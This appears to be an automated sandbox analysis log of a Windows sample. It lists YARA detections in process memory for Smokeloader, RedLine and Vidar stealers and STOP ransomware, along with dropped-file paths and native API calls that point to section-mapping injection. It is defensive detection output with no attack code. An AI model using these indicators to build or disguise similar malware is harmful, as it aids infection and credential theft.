Source: 00000012.00000002.511826941.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000002.531865007.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000E.00000002.468874148.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000002.545785192.0000000004B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.356673245.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000B.00000002.504789684.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000D.00000002.444525144.0000000000889000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001E.00000000.508110815.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000000.427534356.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000019.00000000.468200918.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000019.00000000.468200918.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000000.468200918.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001E.00000000.510353848.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000F.00000002.466699994.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000D.00000002.442880266.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000E.00000002.469202987.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000C.00000002.540527249.0000000002E46000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000000.465494612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000019.00000000.465494612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000000.465494612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000F.00000000.430570444.0000000000819000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000000.434348709.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000F.00000000.426731802.0000000000819000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000F.00000002.466941491.0000000000819000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000014.00000000.415949040.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.550663724.0000000007290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000019.00000000.442875397.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000D.00000002.443176510.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000019.00000000.461705193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000019.00000000.461705193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000000.461705193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001E.00000002.535910271.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000002.542826089.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000002.505917720.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000D.00000002.443497890.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000000.428974978.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000000.345197591.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.504609430.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Process Memory Space: 5487.exe PID: 1272, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: Process Memory Space: 5999.exe PID: 1244, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 5999.exe PID: 4888, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: String function: 0040EF58 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: String function: 048DE43F appears 44 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040EF58 appears 35 times
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040156B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402241 NtQuerySystemInformation, 0_2_00402241
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040224D NtQuerySystemInformation, 0_2_0040224D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402251 NtQuerySystemInformation, 0_2_00402251
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401577
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402219 NtQuerySystemInformation, 0_2_00402219
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040221B NtQuerySystemInformation, 0_2_0040221B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401727 NtMapViewOfSection,NtMapViewOfSection, 0_2_00401727
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401581 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401581
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401584 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401584
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401587
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_0040156B
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00402241 NtQuerySystemInformation, 11_2_00402241
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0040224D NtQuerySystemInformation, 11_2_0040224D
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00402251 NtQuerySystemInformation, 11_2_00402251
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401577
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00402219 NtQuerySystemInformation, 11_2_00402219
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0040221B NtQuerySystemInformation, 11_2_0040221B
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00401727 NtMapViewOfSection,NtMapViewOfSection, 11_2_00401727
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00401581 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401581
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00401584 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401584
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401587
Source: file.exe Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 5999.exe.1.dr Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 405E.exe.1.dr Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 45DE.exe.1.dr Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 49F6.exe.1.dr Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
